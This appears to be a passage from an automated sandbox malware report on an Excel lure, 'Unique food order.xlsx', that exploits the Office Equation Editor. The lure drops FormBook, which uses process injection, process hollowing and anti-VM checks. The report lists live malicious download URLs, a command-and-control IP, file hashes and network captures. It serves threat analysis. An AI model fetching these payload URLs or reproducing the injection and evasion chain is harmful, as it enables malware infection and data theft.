      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B29C2 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5435 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5449 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5472 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B548D mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B4CBB mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B54B9 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Code function: 5_2_001B5531 mov eax, dword ptr fs:[00000030h]
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Code function: 9_2_020C26F8 mov eax, dword ptr fs:[00000030h]
      Source: C:\Users\Public\vbc.exe | Process token adjusted: Debug
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process token adjusted: Debug

      HIPS / PFW / Operating System Protection Evasion:

      Maps a DLL or memory area into another process
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\explorer.exe protection: execute and read and write
      Source: C:\Users\Public\vbc.exe | Section loaded: unknown target: C:\Windows\SysWOW64\NAPSTAT.EXE protection: execute and read and write
      Modifies the context of a thread in another process (thread injection)
      Source: C:\Users\Public\vbc.exe | Thread register set: target process: 1388
      Queues an APC in another process (thread injection)
      Source: C:\Users\Public\vbc.exe | Thread APC queued: target process: C:\Windows\explorer.exe
      Sample uses process hollowing technique
      Source: C:\Users\Public\vbc.exe | Section unmapped: C:\Windows\SysWOW64\NAPSTAT.EXE base address: 960000
      Source: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Users\Public\vbc.exe | Process created: C:\Users\Public\vbc.exe 'C:\Users\Public\vbc.exe'
      Source: C:\Windows\SysWOW64\NAPSTAT.EXE | Process created: C:\Windows\SysWOW64\cmd.exe /c del 'C:\Users\Public\vbc.exe'
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Program Manager
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: Shell_TrayWnd
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmp | Binary or memory string: Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmp | Binary or memory string: !Progman
      Source: explorer.exe, 00000007.00000002.2382028961.00000000001F5000.00000004.00000020.sdmpBinary or memory string: Progman
      Source: explorer.exe, 00000007.00000002.2382289744.00000000006F0000.00000002.00000001.sdmpBinary or memory string: !Progman

      Stealing of Sensitive Information:

      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY
      Yara detected Generic Dropper
      Source: Yara match | File source: Process Memory Space: vbc.exe PID: 2868, type: MEMORY

      Remote Access Functionality:

      Yara detected FormBook
      Source: Yara match | File source: 00000005.00000002.2364771047.000000001E040000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000009.00000002.2381847549.0000000000080000.00000040.00000001.sdmp, type: MEMORY
      Source: Yara match | File source: 00000005.00000002.2360576223.0000000000780000.00000040.00000001.sdmp, type: MEMORY

      Mitre Att&ck Matrix

      Initial Access | Execution | Persistence | Privilege Escalation | Defense Evasion | Credential Access | Discovery | Lateral Movement | Collection | Exfiltration | Command and Control | Network Effects | Remote Service Effects | Impact
      Valid Accounts | Command and Scripting Interpreter1 | Path Interception | Process Injection412 | Masquerading111 | OS Credential Dumping | Security Software Discovery631 | Remote Services | Archive Collected Data1 | Exfiltration Over Other Network Medium | Encrypted Channel1 | Eavesdrop on Insecure Network Communication | Remotely Track Device Without Authorization | Modify System Partition
      Default Accounts | Shared Modules1 | Boot or Logon Initialization Scripts | Boot or Logon Initialization Scripts | Virtualization/Sandbox Evasion23 | LSASS Memory | Virtualization/Sandbox Evasion23 | Remote Desktop Protocol | Data from Removable Media | Exfiltration Over Bluetooth | Ingress Tool Transfer13 | Exploit SS7 to Redirect Phone Calls/SMS | Remotely Wipe Data Without Authorization | Device Lockout
      Domain Accounts | Exploitation for Client Execution13 | Logon Script (Windows) | Logon Script (Windows) | Process Injection412 | Security Account Manager | Process Discovery2 | SMB/Windows Admin Shares | Data from Network Shared Drive | Automated Exfiltration | Non-Application Layer Protocol2 | Exploit SS7 to Track Device Location | Obtain Device Cloud Backups | Delete Device Data
      Local Accounts | At (Windows) | Logon Script (Mac) | Logon Script (Mac) | Deobfuscate/Decode Files or Information1 | NTDS | Remote System Discovery1 | Distributed Component Object Model | Input Capture | Scheduled Transfer | Application Layer Protocol22 | SIM Card Swap | | Carrier Billing Fraud
      Cloud Accounts | Cron | Network Logon Script | Network Logon Script | Obfuscated Files or Information31 | LSA Secrets | File and Directory Discovery1 | SSH | Keylogging | Data Transfer Size Limits | Fallback Channels | Manipulate Device Communication | | Manipulate App Store Rankings or Ratings
      Replication Through Removable Media | Launchd | Rc.common | Rc.common | Steganography | Cached Domain Credentials | System Information Discovery22 | VNC | GUI Input Capture | Exfiltration Over C2 Channel | Multiband Communication | Jamming or Denial of Service | | Abuse Accessibility Features

      Behavior Graph


      Legend:

      • Process
      • Signature
      • Created File
      • DNS/IP Info
      • Is Dropped
      • Is Windows Process
      • Number of created Registry Values
      • Number of created Files
      • Visual Basic
      • Delphi
      • Java
      • .Net C# or VB.NET
      • C, C++ or other language
      • Is malicious
      • Internet
      Behavior Graph ID: 320235 | Sample: Unique food order.xlsx | Startdate: 19/11/2020 | Architecture: WINDOWS | Score: 100
      Signatures attached to the start node: Snort IDS alert for network traffic (e.g. based on Emerging Threat rules); Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 14 other signatures
      Process tree as drawn in the graph (numbers after a process name are the graph's per-node counters):
      • EQNEDT32.EXE (12), started
        • contacts wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu, 103.125.191.5, ports 49165, 49166, 80 (VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN, Viet Nam)
        • drops C:\Users\user\AppData\...\svchost[1].exe, PE32
        • drops C:\Users\Public\vbc.exe, PE32
        • signature: Office equation editor starts processes (likely CVE 2017-11882 or CVE-2018-0802)
        • starts vbc.exe
          • signatures: Detected RDTSC dummy instruction sequence (likely for instruction hammering); Tries to detect Any.run; Tries to detect virtualization through RDTSC time measurements; 2 other signatures
          • starts vbc.exe (9)
            • signatures: Modifies the context of a thread in another process (thread injection); Tries to detect Any.run; Maps a DLL or memory area into another process; 3 other signatures
            • injects into explorer.exe
              • starts NAPSTAT.EXE
                • signature: Tries to detect virtualization through RDTSC time measurements
                • starts cmd.exe
              • starts autoconv.exe
      • EXCEL.EXE (37 16), started
        • drops C:\Users\user\...\~$Unique food order.xlsx, data

      Screenshots


      Antivirus, Machine Learning and Genetic Malware Detection

      Initial Sample

      Source | Detection | Scanner | Label
      Unique food order.xlsx | 25% | Virustotal |
      Unique food order.xlsx | 23% | ReversingLabs | Document-Office.Exploit.CVE-2017-11882

      Dropped Files

      No Antivirus matches

      Unpacked PE Files

      No Antivirus matches

      Domains

      No Antivirus matches

      URLs

      Source | Detection | Scanner | Label
      http://103.125.191.5/bin_xMjelaYnr43.binq~f | 0% | Avira URL Cloud | safe
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
      http://www.icra.org/vocabulary/. | 0% | URL Reputation | safe
      http://103.125.191.5/bin_xMjelaYnr43.binY~f | 0% | Avira URL Cloud | safe
      http://www.%s.com | 0% | URL Reputation | safe
      http://www.%s.com | 0% | URL Reputation | safe
      http://www.%s.com | 0% | URL Reputation | safe
      http://www.%s.com | 0% | URL Reputation | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://www.%s.comPA | 0% | URL Reputation | safe
      http://%s.com | 0% | URL Reputation | safe
      http://%s.com | 0% | URL Reputation | safe
      http://%s.com | 0% | URL Reputation | safe
      http://%s.com | 0% | URL Reputation | safe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
      http://windowsmedia.com/redir/services.asp?WMPFriendly=true | 0% | URL Reputation | safe
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe | 1% | Virustotal |
      http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe | 100% | Avira URL Cloud | malware
      http://treyresearch.net | 0% | URL Reputation | safe
      http://treyresearch.net | 0% | URL Reputation | safe
      http://treyresearch.net | 0% | URL Reputation | safe
      http://treyresearch.net | 0% | URL Reputation | safe
      http://103.125.191.5/bin_xMjelaYnr43.bin | 0% | Avira URL Cloud | safe

      Domains and IPs

      Contacted Domains

      Name | IP | Active | Malicious | Antivirus Detection | Reputation
      wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu | 103.125.191.5 | true | true | | unknown

        Contacted URLs

        Name | Malicious | Antivirus Detection | Reputation
        http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe | true | 1% Virustotal; Avira URL Cloud: malware | unknown
        http://103.125.191.5/bin_xMjelaYnr43.bin | true | Avira URL Cloud: safe | unknown

        URLs from Memory and Binaries

        Name | Source | Malicious | Antivirus Detection | Reputation
        http://services.msn.com/svcs/oe/certpage.asp?name=%s&email=%s&&Check | vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | false | | high
        http://103.125.191.5/bin_xMjelaYnr43.binq~f | vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.icra.org/vocabulary/. | vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | false | URL Reputation: safe (4 entries) | unknown
        http://schemas.xmlsoap.org/ws/2004/08/addressing/role/anonymous. | vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp | false | | high
        http://www.piriform.com/ccleanerhttp://www.piriform.com/ccleanerv | explorer.exe, 00000007.00000000.2332531261.0000000000260000.00000004.00000020.sdmp | false | | high
        http://103.125.191.5/bin_xMjelaYnr43.binY~f | vbc.exe, 00000005.00000002.2360659510.000000000081B000.00000004.00000020.sdmp | false | Avira URL Cloud: safe | unknown
        http://www.%s.com | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe (4 entries) | low
        http://www.piriform.com/ccleaner | explorer.exe, 00000007.00000000.2337234886.00000000039F4000.00000004.00000001.sdmp | false | | high
        http://www.%s.comPA | vbc.exe, 00000005.00000002.2364793051.000000001E1A0000.00000002.00000001.sdmp, explorer.exe, 00000007.00000000.2332755468.0000000001C70000.00000002.00000001.sdmp | false | URL Reputation: safe (4 entries) | low
        http://%s.com | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe (4 entries) | low
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true | vbc.exe, 00000004.00000002.2307635505.0000000003267000.00000002.00000001.sdmp | false | URL Reputation: safe (4 entries) | unknown
        http://treyresearch.net | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | URL Reputation: safe (4 entries) | unknown
        http://auto.search.msn.com/response.asp?MT= | explorer.exe, 00000007.00000000.2351456134.000000000A330000.00000008.00000001.sdmp | false | | high

                  Contacted IPs


                  Public

                  IP | Domain | Country | ASN | ASN Name | Malicious
                  103.125.191.5 | unknown | Viet Nam | 135905 | VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN | true

                  General Information

                  Joe Sandbox Version: 31.0.0 Red Diamond
                  Analysis ID: 320235
                  Start date: 19.11.2020
                  Start time: 07:41:52
                  Joe Sandbox Product: CloudBasic
                  Overall analysis duration: 0h 9m 38s
                  Hypervisor based Inspection enabled: false
                  Report type: light
                  Sample file name: Unique food order.xlsx
                  Cookbook file name: defaultwindowsofficecookbook.jbs
                  Analysis system description: Windows 7 x64 SP1 with Office 2010 SP2 (IE 11, FF52, Chrome 57, Adobe Reader DC 15, Flash 25.0.0.127, Java 8 Update 121, .NET 4.6.2)
                  Number of new started processes analysed: 11
                  Number of new started drivers analysed: 0
                  Number of existing processes analysed: 0
                  Number of existing drivers analysed: 0
                  Number of injected processes analysed: 1
                  Technologies:
                  • HCA enabled
                  • EGA enabled
                  • HDC enabled
                  • AMSI enabled
                  Analysis Mode: default
                  Analysis stop reason: Timeout
                  Detection: MAL
                  Classification: mal100.troj.spyw.expl.evad.winXLSX@10/3@1/1
                  EGA Information: Failed
                  HDC Information:
                  • Successful, ratio: 16.3% (good quality ratio 13%)
                  • Quality average: 54.5%
                  • Quality standard deviation: 34.3%
                  HCA Information:
                  • Successful, ratio: 72%
                  • Number of executed functions: 0
                  • Number of non-executed functions: 0
                  Cookbook Comments:
                  • Adjust boot time
                  • Enable AMSI
                  • Found application associated with file extension: .xlsx
                  • Found Word or Excel or PowerPoint or XPS Viewer
                  • Attach to Office via COM
                  • Scroll down
                  • Close Viewer
                  Warnings:
                  • Exclude process from analysis (whitelisted): dllhost.exe, conhost.exe
                  • TCP Packets have been reduced to 100
                  • Report size getting too big, too many NtOpenKeyEx calls found.
                  • Report size getting too big, too many NtQueryValueKey calls found.

                  Simulations

                  Behavior and APIs

                  Time | Type | Description
                  07:43:12 | API Interceptor | 68x Sleep call for process: EQNEDT32.EXE modified
                  07:44:20 | API Interceptor | 202x Sleep call for process: vbc.exe modified
                  07:44:49 | API Interceptor | 72x Sleep call for process: NAPSTAT.EXE modified

                  Joe Sandbox View / Context

                  IPs

                  No context

                  Domains

                  No context

                  ASN

                  Match: VNPT-AS-VNVIETNAMPOSTSANDTELECOMMUNICATIONSGROUPVN
                  Associated Sample Name / URL | Detection | Context
                  tt payment proof.xlsx | malicious | 103.125.191.187
                  TIE-3735-2020.xlsx | malicious | 103.125.191.229
                  payslip.s.xlsx | malicious | 103.125.191.187
                  Telex-relase.xlsx | malicious | 103.141.138.120
                  Y0L60XAhvo.rtf | malicious | 103.141.138.122
                  d6pj421rXA.exe | malicious | 103.139.45.59
                  8YPssSkVtu.rtf | malicious | 103.141.138.87
                  PI098763556299.xlsx | malicious | 103.125.191.229
                  PIT12425009.xlsx | malicious | 103.125.191.229
                  wIeFid8p7Q.exe | malicious | 103.125.189.164
                  Dell ordine-09362-9-11-2020.exe | malicious | 103.139.45.59
                  shipping documents.xlsx | malicious | 103.133.108.6
                  shipping documents.xlsx | malicious | 103.133.108.6
                  EES RFQ 60-19__pdf.exe | malicious | 103.114.107.156
                  Quotation_20CF18909.xlsx | malicious | 103.141.138.122
                  Quotation_20CF18909.xlsx | malicious | 103.141.138.122
                  Z08LsyTAN6.exe | malicious | 103.125.189.164
                  QUO_M.VECOQUEEN.xlsx.docx | malicious | 103.125.191.123
                  R56D5hnFR3.rtf | malicious | 103.125.191.123
                  http://103.125.191.123/winlog/document.doc | malicious | 103.125.191.123

                  JA3 Fingerprints

                  No context

                  Dropped Files

                  No context

                  Created / dropped Files

                  C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\svchost[1].exe
                  Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Category: downloaded
                  Size (bytes): 61440
                  Entropy (8bit): 4.914988096771549
                  Encrypted: false
                  SSDEEP: 768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5: C05EEE88F0B57E853996957D6523397B
                  SHA1: FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256: 7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512: 9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious: true
                  Reputation: low
                  IE Cache URL: http://wsdyworkfinesanotherrainbowlomoyentwsgha.ydns.eu/worksdoc/svchost.exe
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................

                  C:\Users\user\Desktop\~$Unique food order.xlsx
                  Process: C:\Program Files\Microsoft Office\Office14\EXCEL.EXE
                  File Type: data
                  Category: dropped
                  Size (bytes): 330
                  Entropy (8bit): 1.4377382811115937
                  Encrypted: false
                  SSDEEP: 3:vZ/FFDJw2fj/FFDJw2fV:vBFFGaFFGS
                  MD5: 96114D75E30EBD26B572C1FC83D1D02E
                  SHA1: A44EEBDA5EB09862AC46346227F06F8CFAF19407
                  SHA-256: 0C6F8CF0E504C17073E4C614C8A7063F194E335D840611EEFA9E29C7CED1A523
                  SHA-512: 52D33C36DF2A91E63A9B1949FDC5D69E6A3610CD3855A2E3FC25017BF0A12717FC15EB8AC6113DC7D69C06AD4A83FAF0F021AD7C8D30600AA8168348BD0FA9E0
                  Malicious: true
                  Reputation: moderate, very likely benign file
                  Preview: .user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . ..user ..A.l.b.u.s. . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .

                  C:\Users\Public\vbc.exe
                  Process: C:\Program Files\Common Files\Microsoft Shared\EQUATION\EQNEDT32.EXE
                  File Type: PE32 executable (GUI) Intel 80386, for MS Windows
                  Category: dropped
                  Size (bytes): 61440
                  Entropy (8bit): 4.914988096771549
                  Encrypted: false
                  SSDEEP: 768:t4cVBi/uynLCBod2XkqAy6dH4ErjAxvWhT5z78gdseDd4kyKz:tO/uB953eg9ylzogB+kl
                  MD5: C05EEE88F0B57E853996957D6523397B
                  SHA1: FC16FA4AB9A88F7E2405EB9A77D168D9C1B7C8D3
                  SHA-256: 7E70E44956CDB045FD7B5C66ECA50996900059FD8851AA76BE19A5DD492C6918
                  SHA-512: 9441441F5D6D84E4C674E77013CE1BF562173195DE9AC1C05463BCF0BBDA51345B6AF219B279F93E7D2DF84BBFB22D11906B8A145F1FE98EFAF3A28786BE220F
                  Malicious: true
                  Reputation: low
                  Preview: MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i......................*..............Rich....................PE..L......P.....................0....................@............................................................................<...........................................................................0...0....................................text...`........................... ..`.data...............................@....rsrc...............................@..@.[#X.......I#...........USER32.DLL.MSVBVM60.DLL.........................................................................................................................................................................................................................................................................................................................................................................................................

                  Static File Info

                  General

                  File type: CDFV2 Encrypted
                  Entropy (8bit): 7.996651012349256
                  TrID:
                  • Generic OLE2 / Multistream Compound File (8008/1) 100.00%
                  File name: Unique food order.xlsx
                  File size: 2303488
                  MD5: f2cd263042fce1a4c2cbeed5f1676429
                  SHA1: 608334d6c55e50f3447f865bca59e05b7b60e0cb
                  SHA256: f2f88e0287d17638c5d902a49d19b2c4e989dc2a511411ce959c91b642fb9359
                  SHA512: 847ab0270c6f64d46de8af8039b2092dc7f7978356ff7d5ddb38f7d87c495aa826f4af7d3f4c02547e5e9dd99cd60ca2ee5e5b85b3aa8f2cea3e68ab337ffcca
                  SSDEEP: 49152:sZDn4BcTs7rQj4qUoruUVl7/+jfylwvOcvAg0N+MWSmc:NB6mEj4qUojLmjf/vD0N+3Bc
                  File Content Preview: ........................>...................$...........................................................................z.......|.......~...............z.......|.......~...............z.......|.......~...............z......................................

                  File Icon

                  Icon Hash: e4e2aa8aa4b4bcb4

                  Static OLE Info

                  General

                  Document Type: OLE
                  Number of OLE Files: 1

                  OLE File "Unique food order.xlsx"

                  Indicators

                  Has Summary Info: False
                  Application Name: unknown
                  Encrypted Document: True
                  Contains Word Document Stream: False
                  Contains Workbook/Book Stream: False
                  Contains PowerPoint Document Stream: False
                  Contains Visio Document Stream: False
                  Contains ObjectPool Stream:
                  Flash Objects Count:
                  Contains VBA Macros: False

                  Streams

                  Stream Path: \x6DataSpaces/DataSpaceInfo/StrongEncryptionDataSpace
                  File Type: data
                  Stream Size: 64
                  Entropy: 2.73637206947
                  Base64 Encoded: False
                  Data ASCII: . . . . . . . . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . .
                  Data Raw: 08 00 00 00 01 00 00 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 54 00 72 00 61 00 6e 00 73 00 66 00 6f 00 72 00 6d 00 00 00

                  Stream Path: \x6DataSpaces/DataSpaceMap
                  File Type: data
                  Stream Size: 112
                  Entropy: 2.7597816111
                  Base64 Encoded: False
                  Data ASCII: . . . . . . . . h . . . . . . . . . . . . . . E . n . c . r . y . p . t . e . d . P . a . c . k . a . g . e . 2 . . . S . t . r . o . n . g . E . n . c . r . y . p . t . i . o . n . D . a . t . a . S . p . a . c . e . . .
                  Data Raw: 08 00 00 00 01 00 00 00 68 00 00 00 01 00 00 00 00 00 00 00 20 00 00 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 65 00 64 00 50 00 61 00 63 00 6b 00 61 00 67 00 65 00 32 00 00 00 53 00 74 00 72 00 6f 00 6e 00 67 00 45 00 6e 00 63 00 72 00 79 00 70 00 74 00 69 00 6f 00 6e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 00 00

                  Stream Path: \x6DataSpaces/TransformInfo/StrongEncryptionTransform/\x6Primary
                  File Type: data
                  Stream Size: 200
                  Entropy: 3.13335930328
                  Base64 Encoded: False
                  Data ASCII: X . . . . . . . L . . . { . F . F . 9 . A . 3 . F . 0 . 3 . - . 5 . 6 . E . F . - . 4 . 6 . 1 . 3 . - . B . D . D . 5 . - . 5 . A . 4 . 1 . C . 1 . D . 0 . 7 . 2 . 4 . 6 . } . N . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . E . n . c . r . y . p . t . i . o . n . T . r . a . n . s . f . o . r . m . . . . . . . . . . . . . . . . . . . . . . . . . . . . . . .
                  Data Raw: 58 00 00 00 01 00 00 00 4c 00 00 00 7b 00 46 00 46 00 39 00 41 00 33 00 46 00 30 00 33 00 2d 00 35 00 36 00 45 00 46 00 2d 00 34 00 36 00 31 00 33 00 2d 00 42 00 44 00 44 00 35 00 2d 00 35 00 41 00 34 00 31 00 43 00 31 00 44 00 30 00 37 00 32 00 34 00 36 00 7d 00 4e 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00

                  Stream Path: \x6DataSpaces/Version
                  File Type: data
                  Stream Size: 76
                  Entropy: 2.79079600998
                  Base64 Encoded: False
                  Data ASCII: < . . . M . i . c . r . o . s . o . f . t . . . C . o . n . t . a . i . n . e . r . . . D . a . t . a . S . p . a . c . e . s . . . . . . . . . . . . .
                  Data Raw: 3c 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 2e 00 43 00 6f 00 6e 00 74 00 61 00 69 00 6e 00 65 00 72 00 2e 00 44 00 61 00 74 00 61 00 53 00 70 00 61 00 63 00 65 00 73 00 01 00 00 00 01 00 00 00 01 00 00 00

                  Stream Path: EncryptedPackage
                  File Type: data
                  Stream Size: 2281000
                  Entropy: 7.99991703704
                  Base64 Encoded: True
                  Data ASCII: . . " . . . . . . . P . . a " . . . . . . . l . 0 d { . [ . . . . . ! { " $ % . . . 3 ^ . s . . . . . . . N . . j . k . - I . . . . . . . . X . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . . . . [ ` . 9 Q . . . . . t . . .
                  Data Raw: 1b ce 22 00 00 00 00 00 ed f5 50 da c8 61 22 ee a4 11 a9 b4 92 bd 6c cd 30 64 7b ff 5b f9 81 ec 18 b1 21 7b 22 24 25 91 a0 0b 33 5e dd 73 ff cf d7 ee b7 f6 a4 4e cf 17 6a 1d 6b b2 2d 49 eb bf 97 9d 82 8f 9c 84 58 09 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6 8f 03 5b 60 aa 39 51 b4 0a f6 ba 02 74 97 93 c6

                  Stream Path: EncryptionInfo
                  File Type: data
                  Stream Size: 224
                  Entropy: 4.51880650455
                  Base64 Encoded: False
                  Data ASCII: . . . . $ . . . . . . . $ . . . . . . . . f . . . . . . . . . . . . . . . . . . . . . . M . i . c . r . o . s . o . f . t . . E . n . h . a . n . c . e . d . . R . S . A . . a . n . d . . A . E . S . . C . r . y . p . t . o . g . r . a . p . h . i . c . . P . r . o . v . i . d . e . r . . . . . . . . . . . 9 # . u . @ . W . & . . . . e . " . . . . . h . . V . . . . . . e } . % h . . n . * . . k . % . . M h . u . " 3 - . ? . . . } .
                  Data Raw: 04 00 02 00 24 00 00 00 8c 00 00 00 24 00 00 00 00 00 00 00 0e 66 00 00 04 80 00 00 80 00 00 00 18 00 00 00 00 00 00 00 00 00 00 00 4d 00 69 00 63 00 72 00 6f 00 73 00 6f 00 66 00 74 00 20 00 45 00 6e 00 68 00 61 00 6e 00 63 00 65 00 64 00 20 00 52 00 53 00 41 00 20 00 61 00 6e 00 64 00 20 00 41 00 45 00 53 00 20 00 43 00 72 00 79 00 70 00 74 00 6f 00 67 00 72 00 61 00 70 00 68 00

                  Network Behavior

                  Snort IDS Alerts

                  Timestamp | Protocol | SID | Message | Source Port | Dest Port | Source IP | Dest IP
                  11/19/20-07:43:18.523521 | TCP | 2022550 | ET TROJAN Possible Malicious Macro DL EXE Feb 2016 | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  11/19/20-07:44:36.030811 | TCP | 2018752 | ET TROJAN Generic .bin download from Dotted Quad | 49166 | 80 | 192.168.2.22 | 103.125.191.5

                  Network Port Distribution

                  TCP Packets

                  Timestamp | Source Port | Dest Port | Source IP | Dest IP
                  Nov 19, 2020 07:43:18.207155943 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:18.522345066 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:18.522639036 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:18.523520947 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:18.839695930 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:18.839757919 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:18.839884996 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:18.839920998 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:18.839926004 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:18.839984894 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:18.839993000 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.155149937 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155210018 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155246973 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155272961 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.155287981 CET | 80 | 49165 | 103.125.191.5 | 192.168.2.22
                  Nov 19, 2020 07:43:19.155317068 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
                  Nov 19, 2020 07:43:19.155323029 CET | 49165 | 80 | 192.168.2.22 | 103.125.191.5
